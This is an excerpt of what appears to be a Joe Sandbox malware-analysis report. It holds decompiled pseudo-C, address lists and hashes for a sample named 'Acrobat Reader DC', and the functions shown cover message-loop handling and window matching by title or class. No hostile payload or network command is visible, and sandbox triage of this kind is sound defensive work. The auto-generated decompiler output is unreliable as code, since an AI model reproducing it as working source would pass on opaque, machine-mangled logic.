                                  									GetExitCodeProcess(_t533[0x114],  &_v256);
                                  									_t511 = _t533[0x114];
                                  									CloseHandle(_t511);
                                  									_v324 = _v256;
                                  									_t471 = _t533 +  *_t533->message;
                                  									E0040D410( &_v324, _t533 +  *_t533->message);
                                  									_t533[0x51] = 1;
                                  									_t533[0x3e] = 0;
                                  								}
                                  								goto L29;
                                  							}
                                  							if(_t358 == 8 || _t358 == 9) {
                                  								Sleep(0xa);
                                  								__eflags = _t533[0x112];
                                  								if(_t533[0x112] == 0) {
                                  									__eflags = 0;
                                  									L127:
                                  									_t511 = _t533[0x10e];
                                  									_t471 =  &_v304;
                                  									E00443D19(_t511,  &_v304,  &_v329);
                                  									_t572 =  &(_t572[3]);
                                  									__eflags = _t533[0x3e] - 9;
                                  									if(_t533[0x3e] != 9) {
                                  										__eflags = _v329 - 1;
                                  										if(_v329 != 1) {
                                  											goto L29;
                                  										}
                                  										_t462 = 0;
                                  										__eflags = 0;
                                  										L133:
                                  										_t368 = _t533[0x115];
                                  										_v260 = 0xcccccccc;
                                  										__eflags = _t368 - _t462;
                                  										if(_t368 != _t462) {
                                  											GetExitCodeProcess(_t368,  &_v260);
                                  											CloseHandle(_t533[0x115]);
                                  											_t533[0x115] = _t462;
                                  										}
                                  										__eflags = _t533[0x3e] - 8;
                                  										if(_t533[0x3e] != 8) {
                                  											_t511 =  *_t533;
                                  											_t471 = _v260;
                                  											__eflags = _t533 + _t511->message;
                                  											E00403CD0(_t533 + _t511->message, _v260, _t462);
                                  										} else {
                                  											asm("fild dword [esp+0x2c]");
                                  											__eflags = _v304;
                                  											if(_v304 < 0) {
                                  												_t606 = _t606 +  *0x48cd18;
                                  											}
                                  											_t511 =  *_t533;
                                  											_v324 = _t606;
                                  											_t471 =  &_v324;
                                  											E004574B4(_t533 + _t511->message,  &_v324);
                                  										}
                                  										_t533[0x51] = 1;
                                  										_t533[0x3e] = _t462;
                                  										Sleep(_t533[0xbd]);
                                  										goto L29;
                                  									}
                                  									__eflags = _v329;
                                  									if(_v329 != 0) {
                                  										_v329 = 0;
                                  										goto L29;
                                  									}
                                  									_v329 = 1;
                                  									goto L133;
                                  								}
                                  								_t379 = E0040C620(_t533[0x113]);
                                  								_t462 = 0;
                                  								__eflags = _t511;
                                  								if(__eflags < 0) {
                                  									goto L127;
                                  								}
                                  								if(__eflags > 0) {
                                  									L123:
                                  									_t380 = _t533[0x115];
                                  									__eflags = _t380 - _t462;
                                  									if(_t380 != _t462) {
                                  										CloseHandle(_t380);
                                  										_t533[0x115] = _t462;
                                  									}
                                  									_t511 =  *_t533;
                                  									_t471 = _t533 + _t511->message;
                                  									_v324 = _t462;
                                  									E0040D410( &_v324, _t533 + _t511->message);
                                  									goto L66;
                                  								}
                                  								__eflags = _t379 - _t533[0x112];
                                  								if(_t379 < _t533[0x112]) {
                                  									goto L127;
                                  								}
                                  								goto L123;
                                  							} else {
                                  								if(_t358 == 2 || _t358 == 3 || _t358 == 4 || _t358 == 5 || _t358 == 6) {
                                  									Sleep(0xa);
                                  									__eflags = _t533[0xbc];
                                  									if(_t533[0xbc] == 0) {
                                  										L56:
                                  										_t384 = _t533[0x3e];
                                  										__eflags = _t384 - 3;
                                  										if(_t384 < 3) {
                                  											goto L29;
                                  										}
                                  										_t385 = _t384 - 3;
                                  										__eflags = _t385 - 3;
                                  										if(__eflags > 0) {
                                  											goto L29;
                                  										} else {
                                  											switch( *((intOrPtr*)(_t385 * 4 +  &M0042E18D))) {
                                  												case 0:
                                  													__eax = E0046F3C1(__ecx, __fp0, __edi, 1);
                                  													goto L149;
                                  												case 1:
                                  													__eax = E0046F3C1(__ecx, __fp0, __edi, 1);
                                  													__esi = __eax;
                                  													__eflags = __esi;
                                  													if(__eflags < 0) {
                                  														goto L150;
                                  													}
                                  													if(__eflags <= 0) {
                                  														goto L153;
                                  													}
                                  													goto L29;
                                  												case 2:
                                  													_t386 = E0046FDBF(__eflags, _t606, _t533);
                                  													L149:
                                  													_t547 = _t386;
                                  													__eflags = _t547;
                                  													if(__eflags >= 0) {
                                  														goto L151;
                                  													}
                                  													goto L150;
                                  												case 3:
                                  													__eax = E0046FDBF(__eflags, __fp0, __edi);
                                  													__esi = __eax;
                                  													__eflags = __esi;
                                  													if(__eflags < 0) {
                                  														L150:
                                  														_t511 =  ~_t547;
                                  														E00403C90(_t533 +  *_t533->message, _t511, 0);
                                  														_t471 = _t533 +  *_t533->message;
                                  														_v332 = 0;
                                  														E0040D410( &_v332, _t533 +  *_t533->message);
                                  														__eflags = _t547;
                                  														L151:
                                  														if(__eflags == 0) {
                                  															goto L29;
                                  														}
                                  														__eflags = _t547;
                                  														if(_t547 <= 0) {
                                  															L156:
                                  															_push(_t533[0xbd]);
                                  															_t533[0x51] = 1;
                                  															_t533[0x3e] = 0;
                                  															E004331A2(_t533[0xbd], _t606);
                                  															_t572 =  &(_t572[1]);
                                  															goto L29;
                                  														}
                                  														L153:
                                  														_t389 = _t533[0x3e];
                                  														__eflags = _t389 - 5;
                                  														if(_t389 == 5) {
                                  															L155:
                                  															_v188.hwnd = 0;
                                  															_v188.wParam = 1;
                                  															_v188.lParam = 0;
                                  															E00408F40(_t533,  &_v188);
                                  															_t471 =  *_t533;
                                  															_t511 = _t533 +  *_t533->message;
                                  															__eflags = _t511;
                                  															_v188.wParam = 7;
                                  															_v188 =  *(_t533[0x76]);
                                  															E004731E1( *_t533, _t511,  &_v188, 0);
                                  															E00408F40(_t533,  &_v188);
                                  															goto L156;
                                  														}
                                  														__eflags = _t389 - 3;
                                  														if(_t389 != 3) {
                                  															goto L156;
                                  														}
                                  														goto L155;
                                  													}
                                  													if(__eflags > 0) {
                                  														goto L29;
                                  													}
                                  													goto L153;
                                  											}
                                  										}
                                  										while(1) {
                                  											L58:
                                  											__eflags = _v244.message - 0x12;
                                  											if(_v244.message == 0x12) {
                                  												break;
                                  											}
                                  											_t471 = 0x4a8630;
                                  											_t336 = E0040D150(0x4a8630,  &_v244);
                                  											__eflags = _t336;
                                  											if(_t336 == 0) {
                                  												_t338 = E0040D170(0x4a8630,  &_v244);
                                  												__eflags = _t338;
                                  												if(_t338 == 0) {
                                  													TranslateMessage( &_v244);
                                  													_t471 =  &_v244;
                                  													DispatchMessageW( &_v244);
                                  												}
                                  											}
                                  											_t511 =  &_v244;
                                  											_t337 = PeekMessageW(_t511, 0, 0, 0, 1);
                                  											__eflags = _t337;
                                  											if(_t337 == 0) {
                                  												L8:
                                  												if( *0x4974e6 == 1) {
                                  													 *0x4974ec = 0;
                                  													 *0x4974e6 = 0;
                                  													_t533[0x3e] = 1;
                                  												}
                                  												if(_t533[0x3e] == 1) {
                                  													_t471 = _t533 +  *_t533->message;
                                  													_v304 = 0;
                                  													E0040D410( &_v304, _t533 +  *_t533->message);
                                  													goto L30;
                                  												} else {
                                  													goto L10;
                                  												}
                                  											} else {
                                  												continue;
                                  											}
                                  										}
                                  										_t533[0x3f] = 1;
                                  										_t533[0x3e] = 1;
                                  										goto L8;
                                  									}
                                  									_t400 = E0040C620(_t533[0xbe]);
                                  									_t471 = 0;
                                  									__eflags = _t511;
                                  									if(__eflags < 0) {
                                  										goto L56;
                                  									}
                                  									_t462 = 0;
                                  									if(__eflags > 0) {
                                  										L65:
                                  										__eflags = _t533[0x3e] - 2;
                                  										if(_t533[0x3e] != 2) {
                                  											_t471 = _t533 +  *_t533->message;
                                  											_v324 = _t462;
                                  											E0040D410( &_v324, _t533 +  *_t533->message);
                                  										}
                                  										L66:
                                  										_t533[0x51] = 1;
                                  										_t533[0x3e] = _t462;
                                  										goto L29;
                                  									}
                                  									__eflags = _t400 - _t533[0xbc];
                                  									if(_t400 >= _t533[0xbc]) {
                                  										goto L65;
                                  									}
                                  									goto L56;
                                  								} else {
                                  									_t480 = _a4;
                                  									_t533[0x3d] = _t480;
                                  									_t403 = _t480;
                                  									_t471 = _t480 + 1;
                                  									_a4 = _t480 + 1;
                                  									_t598 = _t403 -  *0x4a90f8; // 0x0
                                  									if(_t598 > 0 || _t403 <= 0) {
                                  										L160:
                                  										_t533[0x3e] = 1;
                                  										goto L29;
                                  									} else {
                                  										_t405 = (_t403 << 4) +  *0x4a912c;
                                  										if(_t405 == 0) {
                                  											goto L160;
                                  										}
                                  										_t549 = _t405;
                                  										_t471 =  *(_t549 + 4);
                                  										_v328 = 0;
                                  										_t511 =  *( *(_t549 + 4));
                                  										_t406 = _t511->wParam;
                                  										if(_t406 != 0) {
                                  											__eflags = _t406 - 0x34;
                                  											if(__eflags != 0) {
                                  												_t407 = _t406 - 1;
                                  												__eflags = _t407 - 0x7e;
                                  												if(_t407 > 0x7e) {
                                  													L166:
                                  													_t511 = _t511->wParam;
                                  													E0045E737(_t606, _t533, 0x1388, _t511);
                                  													goto L29;
                                  												}
                                  												switch( *((intOrPtr*)(( *(_t407 + 0x409614) & 0x000000ff) * 4 +  &M00409600))) {
                                  													case 0:
                                  														__eax = 0;
                                  														__ecx =  &_v164;
                                  														_v164 = 0;
                                  														_v152 = 0;
                                  														__eax =  &_v328;
                                  														__edx = __esi;
                                  														__ebx = __edi;
                                  														_v156 = 1;
                                  														__eax = E00408CC0( &_v328, __ebx, __esi, __fp0,  &_v164);
                                  														__eflags = __eax;
                                  														if(__eax == 0) {
                                  															__edx =  *(__esi + 4);
                                  															__eax = _v328;
                                  															__eax =  *( *(__esi + 4) + _v328 * 4);
                                  															__eflags =  *((short*)(__eax + 8)) - 0x7f;
                                  															if( *((short*)(__eax + 8)) != 0x7f) {
                                  																__ecx =  *((short*)(__eax + 0xa));
                                  																__eax = E0045E737(__fp0, __edi, 0x72,  *((short*)(__eax + 0xa)));
                                  															}
                                  														}
                                  														__esi =  &_v164;
                                  														__eax = E00408F40(__edi, __esi);
                                  														goto L29;
                                  													case 1:
                                  														E00408FC0(_t549, _t606, _t533);
                                  														goto L29;
                                  													case 2:
                                  														__ebx = __edi + 0x488;
                                  														__eax = E00432416(__ebx);
                                  														__eflags = __al;
                                  														if(__al != 0) {
                                  															__eax =  &_v328;
                                  															__eax = E0047FAAE(__fp0, __edi, __esi,  &_v328, __ebx);
                                  															__eflags = __eax;
                                  															if(__eax != 0) {
                                  																__ecx =  *(__esi + 4);
                                  																__edx = _v328;
                                  																__eax =  *( *(__esi + 4) + _v328 * 4);
                                  																__ecx =  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa));
                                  																__eax = E0045E737(__fp0, __edi, 0xaa,  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa)));
                                  															}
                                  														} else {
                                  															__edx =  *((short*)(__edx + 0xa));
                                  															__eax = E0045E737(__fp0, __edi, 0xa7, __edx);
                                  														}
                                  														goto L29;
                                  													case 3:
                                  														goto L29;
                                  													case 4:
                                  														goto L166;
                                  												}
                                  											}
                                  											_t471 =  &_v276;
                                  											_v276 = 0;
                                  											_v268 = 1;
                                  											_v264 = 0;
                                  											_t414 = E004096A0( &_v328, __eflags, _t606, _t533, _t549,  &_v276,  &_v277);
                                  											__eflags = _t414;
                                  											if(_t414 != 0) {
                                  												L37:
                                  												_t564 = _v264;
                                  												__eflags = _t564;
                                  												if(_t564 != 0) {
                                  													 *( *(_t564 + 0xc)) =  *( *(_t564 + 0xc)) - 1;
                                  													_t511 =  *(_t564 + 0xc);
                                  													__eflags = _t511->hwnd;
                                  													if(_t511->hwnd == 0) {
                                  														_push(_t564->i);
                                  														E004111DC();
                                  														_t471 =  *(_t564 + 0xc);
                                  														_push( *(_t564 + 0xc));
                                  														E004111DC();
                                  														_t572 =  &(_t572[2]);
                                  													}
                                  													_push(_t564);
                                  													E004111DC();
                                  													_t572 =  &(_t572[1]);
                                  													_v264 = 0;
                                  												}
                                  												_t415 = _v268;
                                  												__eflags = _t415 - 8;
                                  												if(_t415 == 8) {
                                  													_t565 = _v276;
                                  													__eflags = _t565;
                                  													if(_t565 != 0) {
                                  														__imp__#9(_t565);
                                  														_push(_t565);
                                  														E004111DC();
                                  														_t572 =  &(_t572[1]);
                                  													}
                                  												} else {
                                  													__eflags = _t415 - 0xa;
                                  													if(_t415 == 0xa) {
                                  														_t417 = _v276;
                                  														__eflags = _t417;
                                  														if(_t417 != 0) {
                                  															E0044318E(_t417);
                                  														}
                                  													} else {
                                  														__eflags = _t415 - 5;
                                  														if(_t415 == 5) {
                                  															E0040E270( &_v276, _t564);
                                  														} else {
                                  															__eflags = _t415 - 0xb;
                                  															if(_t415 == 0xb) {
                                  																_t566 = _v276;
                                  																_t511 =  *(_t566 + 4);
                                  																_push(_t511);
                                  																E004111DC();
                                  																_push(_t566);
                                  																E004111DC();
                                  																_t572 =  &(_t572[2]);
                                  															} else {
                                  																__eflags = _t415 - 0xc;
                                  																if(_t415 == 0xc) {
                                  																	_t423 = _v276;
                                  																	__eflags = _t423;
                                  																	if(_t423 != 0) {
                                  																		E0044B3D9(_t423);
                                  																	}
                                  																}
                                  															}
                                  														}
                                  													}
                                  												}
                                  												goto L29;
                                  											}
                                  											_t511 =  *(_t549 + 4);
                                  											_t431 =  *((intOrPtr*)(_t511 + _v328 * 4));
                                  											__eflags =  *((short*)(_t431 + 8)) - 0x7f;
                                  											if( *((short*)(_t431 + 8)) != 0x7f) {
                                  												_t471 =  *((short*)(_t431 + 0xa));
                                  												E0045E737(_t606, _t533, 0x72,  *((short*)(_t431 + 0xa)));
                                  												E00408F40(_t533,  &_v288);
                                  												goto L29;
                                  											}
                                  											goto L37;
                                  										} else {
                                  											E0040AFA0(_t606, _t533, _t549,  &_a4); // executed
                                  											goto L29;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  						if( *0x4a8668 != 0) {
                                  							__eflags = _t533[0x3e];
                                  							if(_t533[0x3e] == 0) {
                                  								goto L10;
                                  							}
                                  						}
                                  						if(PeekMessageW( &_v244, 0, 0, 0, 1) != 0) {
                                  							goto L58;
                                  						}
                                  						goto L8;
                                  					}
                                  					goto L30;
                                  				}
                                  			}

                                  0x00409270
                                  0x00409277
                                  0x0042d7f3
                                  0x0042d7fa
                                  0x0042d801
                                  0x0042d801
                                  0x00409284
                                  0x0042e140
                                  0x0042e146
                                  0x0042e14e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040957e
                                  0x00000000
                                  0x0040957e
                                  0x00409578
                                  0x0042d7dd
                                  0x0042d7e4
                                  0x00000000
                                  0x0042d7e4
                                  0x004094e6
                                  0x004094eb
                                  0x004094ed
                                  0x004094ef
                                  0x00000000
                                  0x00000000
                                  0x004094f1
                                  0x004094f3
                                  0x0040958c
                                  0x0040958c
                                  0x00409593
                                  0x0042deac
                                  0x0042deb2
                                  0x0042deb6
                                  0x0042deb6
                                  0x00409599
                                  0x00409599
                                  0x004095a0
                                  0x00000000
                                  0x004095a0
                                  0x004094f9
                                  0x004094ff
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409327
                                  0x00409327
                                  0x0040932a
                                  0x00409330
                                  0x00409332
                                  0x00409333
                                  0x00409336
                                  0x0040933c
                                  0x0042dff6
                                  0x0042dff6
                                  0x00000000
                                  0x0040934a
                                  0x0040934d
                                  0x00409353
                                  0x00000000
                                  0x00000000
                                  0x00409359
                                  0x0040935b
                                  0x00409360
                                  0x00409364
                                  0x00409366
                                  0x0040936c
                                  0x004093ae
                                  0x004093b1
                                  0x00409450
                                  0x00409451
                                  0x00409454
                                  0x0042e074
                                  0x0042e074
                                  0x0042e07f
                                  0x00000000
                                  0x0042e07f
                                  0x00409461
                                  0x00000000
                                  0x00409475
                                  0x00409477
                                  0x0040947e
                                  0x00409485
                                  0x0040948d
                                  0x00409491
                                  0x00409493
                                  0x00409495
                                  0x004094a0
                                  0x004094a5
                                  0x004094a7
                                  0x004094a9
                                  0x004094ac
                                  0x004094b0
                                  0x004094b3
                                  0x004094b8
                                  0x0042e005
                                  0x0042e00d
                                  0x0042e00d
                                  0x004094b8
                                  0x004094be
                                  0x004094c5
                                  0x00000000
                                  0x00000000
                                  0x0040946b
                                  0x00000000
                                  0x00000000
                                  0x0042e017
                                  0x0042e01e
                                  0x0042e023
                                  0x0042e025
                                  0x0042e041
                                  0x0042e048
                                  0x0042e04d
                                  0x0042e04f
                                  0x0042e055
                                  0x0042e058
                                  0x0042e05c
                                  0x0042e05f
                                  0x0042e06a
                                  0x0042e06a
                                  0x0042e02b
                                  0x0042e02b
                                  0x0042e036
                                  0x0042e036
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409461
                                  0x004093bc
                                  0x004093c7
                                  0x004093cb
                                  0x004093d3
                                  0x004093d7
                                  0x004093dc
                                  0x004093de
                                  0x004093f5
                                  0x004093f5
                                  0x004093f9
                                  0x004093fb
                                  0x00409400
                                  0x00409402
                                  0x00409405
                                  0x00409407
                                  0x0042e0a6
                                  0x0042e0a7
                                  0x0042e0ac
                                  0x0042e0b2
                                  0x0042e0b3
                                  0x0042e0b8
                                  0x0042e0b8
                                  0x0040940d
                                  0x0040940e
                                  0x00409413
                                  0x00409416
                                  0x00409416
                                  0x0040941a
                                  0x0040941e
                                  0x00409421
                                  0x0042e0c0
                                  0x0042e0c4
                                  0x0042e0c6
                                  0x0042e0cd
                                  0x0042e0d3
                                  0x0042e0d4
                                  0x0042e0d9
                                  0x0042e0d9
                                  0x00409427
                                  0x00409427
                                  0x0040942a
                                  0x0042e0e1
                                  0x0042e0e5
                                  0x0042e0e7
                                  0x0042e0ee
                                  0x0042e0ee
                                  0x00409430
                                  0x00409430
                                  0x00409433
                                  0x0042e0fc
                                  0x00409439
                                  0x00409439
                                  0x0040943c
                                  0x0042e106
                                  0x0042e10a
                                  0x0042e10d
                                  0x0042e10e
                                  0x0042e116
                                  0x0042e117
                                  0x0042e11c
                                  0x00409442
                                  0x00409442
                                  0x00409445
                                  0x0042e124
                                  0x0042e128
                                  0x0042e12a
                                  0x0042e131
                                  0x0042e131
                                  0x0042e12a
                                  0x00409445
                                  0x0040943c
                                  0x00409433
                                  0x0040942a
                                  0x00000000
                                  0x00409421
                                  0x004093e0
                                  0x004093e7
                                  0x004093ea
                                  0x004093ef
                                  0x0042e089
                                  0x0042e091
                                  0x0042e09a
                                  0x00000000
                                  0x0042e09a
                                  0x00000000
                                  0x0040936e
                                  0x00409374
                                  0x00000000
                                  0x00409374
                                  0x0040936c
                                  0x0040933c
                                  0x004092fd
                                  0x004092eb
                                  0x0040924d
                                  0x0042d7cb
                                  0x0042d7d2
                                  0x00000000
                                  0x00000000
                                  0x0042d7d8
                                  0x0040926a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040926a
                                  0x00000000
                                  0x00409230

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchSleepTranslate
                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                  • API String ID: 1762048999-758534266
                                  • Opcode ID: 15dcb5d528b90cbf280402e836c3a70aa6db35cce11634cc13f3e26047f2c4c1
                                  • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                  • Opcode Fuzzy Hash: 15dcb5d528b90cbf280402e836c3a70aa6db35cce11634cc13f3e26047f2c4c1
                                  • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  [Control-flow graph for the function starting at 46ed8e; legend: Executed / Not Executed]
                                  C-Code - Quality: 78%
                                  			E0046ED8E(void* __eflags, void* __fp0, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24, char _a28, char _a32) {
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v68;
                                  				intOrPtr _v72;
                                  				intOrPtr _v76;
                                  				struct HWND__* _v80;
                                  				signed int _v84;
                                  				char _v88;
                                  				char _v96;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t157;
                                  				void* _t158;
                                  				signed int _t173;
                                  				short* _t189;
                                  				signed int _t193;
                                  				signed int _t194;
                                  				signed int _t198;
                                  				signed int _t209;
                                  				signed int _t211;
                                  				char* _t214;
                                  				signed int _t215;
                                  				signed int _t218;
                                  				signed int _t220;
                                  				signed int _t222;
                                  				signed int _t223;
                                  				signed int _t224;
                                  				signed int _t225;
                                  				signed int _t227;
                                  				signed int _t228;
                                  				signed int _t229;
                                  				signed int _t231;
                                  				signed int _t232;
                                  				signed int _t233;
                                  				signed int _t234;
                                  				signed int _t242;
                                  				signed int _t243;
                                  				signed int _t245;
                                  				signed int _t246;
                                  				signed int _t247;
                                  				signed int _t249;
                                  				signed int* _t252;
                                  				signed int _t258;
                                  				signed int _t263;
                                  				signed int _t269;
                                  				signed int* _t273;
                                  				signed int _t277;
                                  				intOrPtr* _t343;
                                  				struct HWND__* _t371;
                                  				signed int* _t373;
                                  				signed int _t378;
                                  				void* _t380;
                                  				void* _t381;
                                  				void* _t383;
                                  				void* _t385;
                                  				void* _t387;
                                  				void* _t388;
                                  				void* _t389;
                                  				void* _t390;
                                  				void* _t391;
                                  				void* _t392;
                                  				void* _t393;
                                  				void* _t398;
                                  
                                  				_t398 = __fp0;
                                  				_t393 = __eflags;
                                  				_t380 = (_t378 & 0xfffffff8) - 0x54;
                                  				_t158 = E004109E0(_t157, _a16);
                                  				_t343 = _a4;
                                  				_v72 = _t343 + 0xec;
                                  				E004109E0(_t158, _t343 + 0xec);
                                  				_t323 = _a8;
                                  				 *((char*)(_t343 + 4)) = _a32;
                                  				 *((char*)(_t343 + 5)) = _a28;
                                  				_v88 = _t343 + 0x14;
                                  				E0040E0A0(_t343 + 0x14, _a8);
                                  				_t361 = _t343 + 0x24;
                                  				_v80 = _t343 + 0x24;
                                  				E0040E0A0(_t343 + 0x24, _a12);
                                  				_v88 = _t343 + 0xbc;
                                  				E00402160(_t343 + 0xbc, 0x484ea8, _a8, _t343);
                                  				 *(_t343 + 0x10) = _a20;
                                  				 *(_t343 + 0xcc) = 1;
                                  				 *((char*)(_t343 + 0xc)) = 1;
                                  				 *((intOrPtr*)(_t343 + 8)) = 0;
                                  				 *((intOrPtr*)(_t343 + 0xd0)) = 0;
                                  				 *((intOrPtr*)(_t343 + 0xe4)) = 0;
                                  				E0040BC70( &_v60, _t393);
                                  				E0040BC70( &_v44, _t393);
                                  				_t287 =  &_v28;
                                  				E0040BC70( &_v28, _t393);
                                  				_t169 =  *(_t343 + 0x10);
                                  				if( *(_t343 + 0x10) < 0) {
                                  					_t269 = E004152BB(_t323, _t169);
                                  					_t380 = _t380 + 4;
                                  					 *(_t343 + 0x10) = _t269;
                                  					 *((char*)(_t343 + 0xc)) = 0;
                                  				}
                                  				_t395 =  *(_t343 + 0x10) - 4;
                                  				if( *(_t343 + 0x10) == 4) {
                                  					E00469296(_v88, _t395, _t398, _v88);
                                  					 *(_t343 + 0x10) = 1;
                                  				}
                                  				if(E00436565(_v88) == 0 || E00436565(_t361) == 0) {
                                  					_t362 = _v88;
                                  					__eflags =  *((short*)(E00401C90(0, _v88, __eflags))) - 0x5b;
                                  					_t273 = _a4;
                                  					if(__eflags != 0) {
                                  						L54:
                                  						_t173 = E00436565( &_v20);
                                  						__eflags = _t173;
                                  						if(_t173 == 0) {
                                  							E0040E0A0(_v88,  &_v20);
                                  						}
                                  						__eflags = _t273[2];
                                  						if(_t273[2] == 0) {
                                  							_t273[2] = 1;
                                  						}
                                  						_t273[2] = _t273[2] | 0x00000004;
                                  						__eflags = _t273[3];
                                  						if(_t273[3] == 0) {
                                  							E00410BC0(_v76);
                                  						}
                                  						__eflags = _t273[2] & 0x00000001;
                                  						if((_t273[2] & 0x00000001) != 0) {
                                  							__eflags = _t273[3];
                                  							if(_t273[3] == 0) {
                                  								E00410BC0(_v88);
                                  							}
                                  						}
                                  						__eflags = _a24;
                                  						_push(_t273);
                                  						_push(0x46130d);
                                  						if(_a24 == 0) {
                                  							EnumWindows(); // executed
                                  						} else {
                                  							EnumChildWindows(GetDesktopWindow(), ??, ??);
                                  						}
                                  						_t345 = _a16;
                                  						E004109E0(E004457DF(_a16, _v76), _v76);
                                  						__eflags = _t273[0x39] - 1;
                                  						if(_t273[0x39] >= 1) {
                                  							E0044CDAF( *((intOrPtr*)(_t345 + 4)), _t345, _t273,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t345 + 4)))))));
                                  						}
                                  						E00402250( &_v24);
                                  						E00402250( &_v40);
                                  						E00402250( &_v56);
                                  						return _t273[0x39];
                                  					} else {
                                  						_t189 = E00401C90(_t273[6] - 1, _t362, __eflags);
                                  						__eflags =  *_t189 - 0x5d;
                                  						if( *_t189 == 0x5d) {
                                  							_v84 = 1;
                                  							_t350 = _t273[6] - 2;
                                  							__eflags = _t273[6] - 2;
                                  							while(1) {
                                  								__eflags = E00461A5B(_v88, _t398, _v88,  &_v52,  &_v36,  &_v84, _t350);
                                  								if(__eflags == 0) {
                                  									goto L54;
                                  								}
                                  								_t193 = E00445AE0(__eflags,  &_v52, L"LAST");
                                  								_t381 = _t380 + 8;
                                  								__eflags = _t193;
                                  								if(__eflags != 0) {
                                  									_t194 = E00445AE0(__eflags,  &_v36, 0x484ea8);
                                  									__eflags = _t194;
                                  									if(_t194 == 0) {
                                  										goto L42;
                                  									} else {
                                  										_t277 =  *_t273;
                                  										__eflags = _t277;
                                  										if(_t277 == 0) {
                                  											goto L46;
                                  										} else {
                                  											_push( &_v80);
                                  											_v80 =  *_t277;
                                  											_push(_a16);
                                  											goto L8;
                                  										}
                                  									}
                                  								} else {
                                  									_t303 =  &_v52;
                                  									_t209 = E00445AE0(__eflags,  &_v52, L"ACTIVE");
                                  									_t383 = _t381 + 8;
                                  									__eflags = _t209;
                                  									if(__eflags != 0) {
                                  										_t211 = E00445AE0(__eflags,  &_v36, 0x484ea8);
                                  										__eflags = _t211;
                                  										if(_t211 == 0) {
                                  											goto L42;
                                  										} else {
                                  											_push(GetForegroundWindow());
                                  											goto L49;
                                  										}
                                  									} else {
                                  										_t215 = E00445AE0(__eflags,  &_v52, L"HANDLE");
                                  										_t385 = _t383 + 8;
                                  										__eflags = _t215;
                                  										if(__eflags != 0) {
                                  											E00432C30(__eflags, _v36,  &_v80);
                                  											_t371 = _v80;
                                  											_t218 = IsWindow(_t371);
                                  											__eflags = _t218;
                                  											if(_t218 == 0) {
                                  												L46:
                                  												E00402250( &_v20);
                                  												E00402250( &_v36);
                                  												E00402250( &_v52);
                                  												__eflags = 0;
                                  												return 0;
                                  											} else {
                                  												_push(_t371);
                                  												L49:
                                  												_push(_t273);
                                  												E0044CDAF(_t303, _t350);
                                  												_v88 =  *( *_t273);
                                  												_t214 =  &_v88;
                                  												goto L7;
                                  											}
                                  										} else {
                                  											_t220 = E00445AE0(__eflags,  &_v52, L"REGEXPTITLE");
                                  											_t380 = _t385 + 8;
                                  											__eflags = _t220;
                                  											if(__eflags == 0) {
                                  												_t222 = E00445AE0(__eflags,  &_v52, L"CLASS");
                                  												_t380 = _t380 + 8;
                                  												__eflags = _t222;
                                  												if(__eflags == 0) {
                                  													_t223 = E00445AE0(__eflags,  &_v52, L"REGEXPCLASS");
                                  													_t380 = _t380 + 8;
                                  													__eflags = _t223;
                                  													if(__eflags == 0) {
                                  														_t224 = E00445AE0(__eflags,  &_v52, "X");
                                  														_t387 = _t380 + 8;
                                  														__eflags = _t224;
                                  														if(__eflags == 0) {
                                  															_t225 = E00445AE0(__eflags,  &_v52, "Y");
                                  															_t388 = _t387 + 8;
                                  															__eflags = _t225;
                                  															if(__eflags == 0) {
                                  																_t227 = E00445AE0(__eflags,  &_v52, "W");
                                  																_t389 = _t388 + 8;
                                  																__eflags = _t227;
                                  																if(__eflags == 0) {
                                  																	_t228 = E00445AE0(__eflags,  &_v52, "H");
                                  																	_t390 = _t389 + 8;
                                  																	__eflags = _t228;
                                  																	if(__eflags == 0) {
                                  																		_t229 = E00445AE0(__eflags,  &_v52, L"INSTANCE");
                                  																		_t391 = _t390 + 8;
                                  																		__eflags = _t229;
                                  																		if(__eflags == 0) {
                                  																			_t231 = E00445AE0(__eflags,  &_v52, L"ALL");
                                  																			_t392 = _t391 + 8;
                                  																			__eflags = _t231;
                                  																			if(__eflags == 0) {
                                  																				_t232 = E00445AE0(__eflags,  &_v52, L"TITLE");
                                  																				_t380 = _t392 + 8;
                                  																				__eflags = _t232;
                                  																				if(__eflags == 0) {
                                  																					_t233 = E0044CD93(__eflags,  &_v52, 0x484ea8);
                                  																					_t380 = _t380 + 8;
